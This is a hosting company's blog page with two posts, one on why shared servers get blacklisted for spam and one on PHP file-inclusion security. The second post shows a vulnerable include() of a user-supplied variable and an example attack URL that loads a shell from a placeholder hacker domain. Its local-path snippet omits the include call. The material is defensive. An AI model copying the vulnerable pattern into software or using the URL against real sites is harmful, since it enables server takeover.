RSS Updates

Recent Status Updates

Categories

Ajax CommentLuv Enabled d7bd6171d8498636a60ff2238fbfcd00

11

Oct

7

Please Help Us To Help Your Email

Published by Laurence (aka NexDog) in Web Hosting.

On shared hosting servers we have hundreds of domains and thousands of mail users using a single server. And all these domains and users send email out on one IP. Everyone on a server has a joint responsibilty to keep their server’s IP off email blacklists! Every week we receive complaints that some server’s IP has been blacklisted by AOL or some other provider and we can easily fix the issue by changing the IP or asking to be whitelist but this works only until the next time.

So why do servers send spam and get blacklisted? Back in the old days the big problem was formmail. While these do still present problems their are two main reasons these days:

1) Email boxes get hacked and mail is sent. This does not mean that a hacker is physically trying to hack into your mailbox, connects via Outlook or Webmail, reads your mail and then sends a million emails. It is all done automatically by spambots that crawl the web. They find a domain and then run a username and password script against it so if you have a mailbox caled “info” with password “123456″ then you WILL get hacked. You may never know about it but a spambot will connect to the server with your credentials and send spam. You might receive some mail failures from messages you didn’t send which would indicate this might have happened (but you can also get failures from mail sent to look as though it came from your domain but wasn’t sent from our server which is called “spoofing”) or the spambot can simply blackhole the Reply To field so you’d never know if this has happened.

SOLUTION: Use a password that does not exist in a dictionary and is at least a combination of letters and numbers. The more complex the characters, the harder it is to hack. If you are a reseller or simply have other people using mail on your domains please tell them to use better passwords.

2) Popular software like WordPress or OSCommerce or any freeware PHP script will always be targeted by spammers because they are so widely used. The programmers that make such software constantly update their code not just to add new features but because a spammer has found a new way to exploit their code and hack a server or mail function. If you use some popular PHP script you absolutely MUST keep it updated. If the software provider releases an update you should upgrade as soon as possible.

Please help us to keep mail flowing!

Tags: email, security | 2 Comments

10

Jun

21

PHP Security and YOU – Including files the right way

Published by Laurence (aka NexDog) in Web Development.

As a web host we fight the battle against hackers and bad code on a daily basis. So HostNexus is looking to encourage clients to use file inclusion within PHP in a more security conscious and safe manner.

Including files with PHP is a common practice and most usage comes in 2 forms. These are including internal files from your own domain and including files from remote (external) sources. This looks something like:

Internal:

< ?php
   include("http://www.myowndomain.com/something.txt");
?>

External:

< ?php
   include("http://www.externaldomain.com/something.txt");
?>

Both are valid syntax in the PHP world but there are two main problems we see on the servers. Sometimes when you include a file using the the URL of your local domain you can cause a PHP loop that initiates endless HTTP requests which causes server load issues and even a server crash due to the load. If you want to include files from your local domain you just need to use the server path instead:

< ?php
   ('/home/httpd/vhosts/myowndomain.com/httpdocs/something.txt');
?>

And now onto using include() for calling external files:

< ?php
   include("http://www.externaldomain.com/something.txt");
?>

The main problem with include() is that runs everything through the PHP parser and evaluates code. The main problem comes from setting a variable for include() which can be easily exploited. Here is an example of code in an index.php:

< ?php
    echo "<html>\n";
    echo "  <body>\n";
    include("$go");
    echo "  </body>\n";
    echo "\n";
?>

The $go variable above is easily exploited like:

http://myowndomain.com/index.php?go=http://www.hackerdomain.com/shell.txt

The hacker can now execute commands on your files, installing phishing sites, sending spam and stealing data.

If you want to include files from remote domains use PHP’s readfile() function instead:

http://www.php.net/manual/en/function.readfile.php

While not 100% secure it still provides more protection as readfile() simply outputs data to a browser rather than parsing everything as PHP.

We’d love to enforce the two practices above but we also understand not everyone is happy modifying code. However, if you know you use includes and have even a simple understanding of these fuctions then please do revisit your code and help yourself to secure your data and server.

Laurence

Tags: php, security | 2 Comments

Latest from our Blog

Domain Price Increase For Domain Re...
Epic Fraud Attempt – from Charlie...
Merry Christmas from HostNexus...
Cloud Hosting Coming Soon!
Please Help Us To Help Your Email...

Latest From the Forum

Boson File Maintenance - Wednesday...
PCI Compliance...
HTTP down. Any ETA or severity upd...
PION Server Plesk Upgrade - Saturda...
VPS1 Backup options...

Navigate Our Site

Copyright 2001 - 2010. Hostnexus. All Rights Reserved.
Valid XHTML 1.0  CSS Valid